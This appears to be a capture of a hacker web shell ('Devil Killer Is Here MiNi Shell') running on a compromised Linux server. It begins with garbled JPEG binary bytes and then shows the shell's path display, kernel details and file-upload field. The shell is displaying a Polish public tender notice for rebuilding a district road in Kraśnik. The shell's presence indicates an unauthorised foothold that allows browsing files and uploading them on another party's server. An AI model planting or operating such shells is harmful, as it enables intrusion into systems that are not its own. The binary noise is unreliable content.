JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220419/0012607902-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa drogi powiatowej nr 2701L ul. Budzyńska w m. Kraśnik </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Powiatowych w Kraśniku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431029369</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szpitalna 2A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraśnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">23-204</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">81-8264126</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zdp-krasnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdp-krasnik.powiatkrasnicki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa drogi powiatowej nr 2701L ul. Budzyńska w m. Kraśnik </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-532e48e4-bfc4-11ec-b879-9a86e5ac3946</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00126079</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-19</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdp-powiatkrasnicki.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zdp-powiatkrasnicki.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu<br/>Zamawiający dopuszcza możliwość przekazywania sobie przez strony<br/>postępowania oświadczeń, wniosków, zawiadomień oraz informacji elektronicznie za pośrednictwem<br/>Platformy znajdującej się pod adresem: https://zdp-powiatkrasnicki.ezamawiajacy.pl w zakładce<br/>„Korespondencja”. 2. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za<br/>dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do<br/>Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień<br/>oraz informacji przyjmuje się datę ich złożenia/wysłania na Platformie. 3.Ogólne zasady korzystania z Platformy, z zastrzeżeniem pkt<br/>8 niniejszego rozdziału: 3.1. Zgłoszenie do postępowania wymaga<br/>zalogowania Wykonawcy do Systemu na subdomenie https://zdp-powiatkrasnicki.ezamawiajacy.pl, lub<br/>https://oneplace.marketplanet.pl .3.2. Wykonawca po wybraniu opcji „Przystąp do postępowania”<br/>zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o<br/>możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/>kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło,<br/>wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”. 3.3. Rejestracja<br/>Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca<br/>Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci<br/>elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma<br/>informację, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się<br/>pod numerem telefonu podanym w ww. potwierdzeniu. 3.4. Po założeniu konta Wykonawca<br/>ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami,<br/>w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za<br/>pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się<br/>datę ich wysłania za pośrednictwem zakładki „Korespondencja”. 4. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie<br/>treści SWZ. Wniosek należy przesłać za pośrednictwem Platformy<br/>Zakupowej przez opcję „Zadaj pytanie” lub przy użyciu zakładki „Korespondencja”. 5. Treść pytań (bez<br/>ujawniania źródła zapytania) wraz z wyjaśnieniami bądź informacje o dokonaniu modyfikacji SWZ,<br/>Zamawiający zamieści za pośrednictwem Platformy Zakupowej. 6. Zamawiający informuje, iż<br/>w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca<br/>winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa, tel. +48 22<br/>576 22 23 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) email:<br/>oneplace@marketplanet.pl. 7. Zamawiający określa dopuszczalny format podpisu<br/>elektronicznego, jako: 7.1. Dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES. 7.2.<br/>Dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny<br/>plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć, prócz podpisanego<br/>dokumentu, oddzielny plik z podpisem. 8. Zamawiający określa niezbędne wymagania<br/>sprzętowoaplikacyjne umożliwiające pracę na Platformie Zakupowej tj.: 8.1. Stały dostęp do sieci<br/>Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; 8.2. Komputer klasy PC lub MAC,<br/>o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje; 8.3.<br/>Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w<br/>przypadku Internet Explorer minimalnie wersja 10.0; 8.4. Włączona obsługa JavaScript; 8.5.<br/>Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że: 1)administratorem Pani/Pana danych osobowych<br/>jest:Zarządu Dróg Powiatowych w Kraśniku,reprezentowany przez Dyrektora Zarządu Dróg<br/>Powiatowych, ul.Szpitalna 2A, 23-204 Kraśnik tel.(+48) 81 8264126, fax: (+48) 81 8251027, e-mail:<br/>sekretariat@zdp-krasnik.pl; 2) kontakt z Inspektorem Ochrony Danych: adres e-mail:<br/>abi@powiatkrasnicki.pl;Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Przebudowa<br/>drogi powiatowej nr 2701L ul. Budzyńska w m. Kraśnik&#34;<br/>(oznaczenie sprawy: ZDP/5/TP/2022) prowadzonym w trybie podstawowym; 3) odbiorcami Pani/Pana<br/>danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11września 2019 r. – Prawo zamówień<br/>publicznych (tekst jedn. Dz. U. z 2021 r. poz.1129 z późn. zm.),dalej „ustawa Pzp”; 4)Pani/Pana dane<br/>osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia<br/>zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata,<br/>okres przechowywania obejmuje cały czas trwania umowy; 5)obowiązek podania przez Panią/Pana<br/>danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 6) w odniesieniu do Pani/Pana<br/>danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO; 7) posiada Pani/Pan:a)na podstawie art. 15RODO prawo dostępu do danych osobowych<br/>Pani/Pana dotyczących;b)na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych *;c)na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO<br/>**; d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; 8) nie<br/>przysługuje Pani/Panu:a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;c) na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO 9) odbiorcą<br/>Pani/Pana<br/>danych osobowych będą upoważnieni pracownicy Zarządu Dróg Powiatowych w Kraśniku oraz spółka<br/>Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672) przy ul. Domaniewskiej 49, wpisaną<br/>do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego,prowadzonego przez Sąd Rejonowy dla<br/>m.st. Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem<br/>KRS: 0000041441, REGON: 017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na<br/>której Zarządu Dróg Powiatowych w Kraśniku prowadzi postępowania o udzielenie zamówienia<br/>publicznego, działającą pod adresem: https://zdp-powiatkrasnicki.ezamawiajacy.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP/5/TP/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem zamówienia jest przebudowa drogi powiatowej nr 2701L <br/> ul. Budzyńska w m. Kraśnik.<br/>Roboty na ww. drodze powiatowej odbywać się będą zgodnie z technologią i opisem w załączonej do SWZ dokumentacji technicznej do zgłoszenia robót budowlanych oraz Projekcie stałej organizacji ruchu.<br/>Niniejsze zadanie inwestycyjne planowane jest do realizacji przy dofinansowaniu ze środków Rządowego Funduszu<br/>Rozwoju Dróg<br/>2. Określenie zakresu zamówienia/podstawowe elementy robót: roboty przygotowawcze, roboty ziemne, odwodnienie<br/>korpusu drogowego, podbudowy, nawierzchnie,roboty wykończeniowe,oznakowanie dróg,element ulic.<br/>Dokładne ilości robót przewidzianych do wykonania określono w załączonym przedmiarze robót i kosztorysie ofertowym<br/>(Załącznik nr 2).<br/>Zasady prowadzenia i odbioru robót budowlanych związanych z przebudową ww. drogi określają Szczegółowe specyfikacje<br/>techniczne wykonania i odbioru robót (załączone do SWZ).<br/>3.Roboty towarzyszące oraz tymczasowe nie objęte dokumentacją projektową i przedmiarami robót konieczne do<br/>uwzględnienia:<br/>- koszty urządzenia i organizacji placu budowy oraz wody, energii na cele budowlane,<br/>- zabezpieczenie terenu budowy w okresie trwania budowy,<br/>- koszty utrzymania dróg przez cały okres trwania umowy w stanie technicznym niepogorszonym (zapewniającym<br/>przejezdność ) likwidując wykruszenia i wyboje poprzez wykonanie remontów cząstkowych masą mineralno-asfaltową,<br/>- koszty zimowego utrzymania dróg wraz z chodnikami i zjazdami – należy na bieżąco odśnieżać całą szerokość jezdni i<br/>chodnika oraz zwalczać śliskość przy użyciu odpowiednich środków chemicznych, zgonie z obowiązującymi wymaganiami w<br/>planie zimowego utrzymania tut. dróg powiatowych,<br/>- drogi tymczasowe i montażowe,<br/>- obsługa geodezyjna ( m.in. wytyczenie i inwentaryzacja powykonawcza),<br/>- zapewnienie generalnego wykonawstwa i kierowania budowy,<br/>- ubezpieczenie robót, sprzętu Wykonawcy od ryzyka i odpowiedzialności cywilnej osób trzecich i ubezpieczenie własnego<br/>personelu,<br/>- uzyskanie zgody od właścicieli gruntów na ewentualne wejście na grunty prywatne podczas budowy i ich przywrócenie do<br/>stanu pierwotnego po zakończeniu budowy,<br/>- prowadzenie pomiarów kontrolnych zgodnie z wymogami SST wraz z pobieraniem próbek i dostarczaniem ich organom<br/>kontrolnym Zamawiającego ( nadzór inwestorski),<br/>- koszty transportu i rozładunku we wskazanym miejscu na bazie Obwodu Drogowego w Spławach materiałów z rozbiórki:<br/>gruz, krawężniki, obrzeża, drzewa, słupki, znaki, kostka brukowa z chodników i ze zjazdów oraz elementy betonowe ze<br/>zjazdów, rumosz z rozbiórki nawierzchni itp. (o ile nie zostały przewidziane do ponownego wbudowania), oraz koszty<br/>utylizacji lub zagospodarowania we własnym zakresie: drobnego gruzu i gruzu z ziemią itp. oraz pozostałości po wycince i<br/>karczowaniu drzew i krzewów(drobne gałęzie, pniaki i korzenie) oraz śmieci i odpadów<br/>- zapewnienie prawidłowego odprowadzenia wód opadowych,<br/>- ustawienie tablicy informującej o zrealizowaniu zadania przy współudziale środków z Rządowego Funduszu Rozwoju Dróg<br/>zgodnie z obowiązującymi wymaganiami w tym zakresie,<br/>- sporządzenie dokumentacji powykonawczej,<br/>- koszty związane z udziałem Wykonawcy w przeprowadzanych przez Zamawiającego przeglądach okresowych w okresie<br/>gwarancji.<br/>4. Szczegółowy opis przedmiotu zamówienia określają:<br/>- Dokumentacja techniczna do zgłoszenia robót budowlanych,<br/>- Projekt stałej organizacji ruchu ,<br/>- Szczegółowe specyfikacje techniczne wykonania i odbioru robót.<br/>5.Realizacja przedmiotu zamówienia winna być wykonana w oparciu o obowiązujące przepisy a w szczególności ustawy z<br/>dnia 7 lipca 1994 roku Prawo budowlane (tekst jedn. Dz.U. z 2021 r, poz. 2351 z późn. zm.) wraz z przepisami<br/>wykonawczymi, a w szczególności: rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999r. w<br/>sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (tekst jedn. Dz.U. z 2016 r.<br/>poz. 124), rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 30 maja 2000 r. w sprawie warunków<br/>technicznych, jakim powinny odpowiadać drogowe obiekty inżynieryjne i ich usytuowanie (Dz.U. z 2000r. Nr 63, poz. 735 z<br/>późn. zm.), ustawy z dnia 21 marca 1985 r. o drogach publicznych (tekst jedn. Dz.U. z 2020 r., poz. 470 z późn. zm.), przez<br/>Wykonawcę posiadającego stosowne doświadczenie i potencjał wykonawczy, określony w SIWZ, oraz przez osoby<br/>posiadające odpowiednie kwalifikacje i doświadczenie.<br/>6.Wykonawca odpowiedzialny będzie za całokształt, w tym za przebieg oraz terminowe wykonanie zamówienia, za jakość,<br/>zgodność z warunkami technicznymi i jakościowymi określonymi dla przedmiotu zamówienia.<br/>7.Wymagana jest należyta staranność przy realizacji zamówienia, rozumiana jako staranność profesjonalisty w działalności<br/>objętej przedmiotem niniejszego zamówienia.<br/>8.Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu zamówienia robót zamiennych w stosunku<br/>do przewidywanych dokumentacją projektową sytuacji, gdy wykonanie tych robót będzie niezbędne do prawidłowego, tj.<br/>zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami.<br/>9.Zamawiający, w każdym przypadku, gdy opisuje przedmiot zamówienia poprzez odniesienie do norm, europejskich ocen<br/>technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, dopuszcza rozwiązania równoważne<br/>opisywanym.<br/>10.Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany<br/>wykazać, że oferowane przez niego roboty budowlane, spełniają wymagania określone przez Zamawiającego. W takiej<br/>sytuacji Zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających rozwiązania równoważne.<br/>Wykonawca może, przy pomocy innych dokumentów wykazać, że oferowane przez niego rozwiązania równoważne<br/>spełniają wymogi wynikające ze wskazanych norm lub odpowiednich specyfikacji technicznych. Zamawiający zastrzega<br/>sobie prawo wystąpienia do autora Projektu budowlano-wykonawczego o opinię na temat oferowanych materiałów lub<br/>urządzeń. Opinia ta może stanowić podstawę do podjęcia przez zamawiającego decyzji o przyjęciu materiałów lub urządzeń<br/>równoważnych albo odrzuceniu oferty z powodu braku równoważności. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233100-0 - Roboty w zakresie budowy autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze najkorzystniejszą ofertę spośród nie odrzuconych<br/>ofert. Szczegółowy opis kryteriów oceny ofert wymienionych poniżej oraz sposób oceny zawarty jest w rozdziale XVIII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawcy zobowiązani będą wykazać spełnienie warunku dotyczącego: 1) Zdolności<br/>technicznej lub zawodowej- na potwierdzenie spełniania warunku Wykonawcy ubiegający się o<br/>udzielenie zamówienia wykażą, że: a) zrealizowali w ciągu ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>minimum dwa zamówienia polegające na budowie, przebudowie, remoncie itp. (z wyłączeniem<br/>remontów cząstkowych) 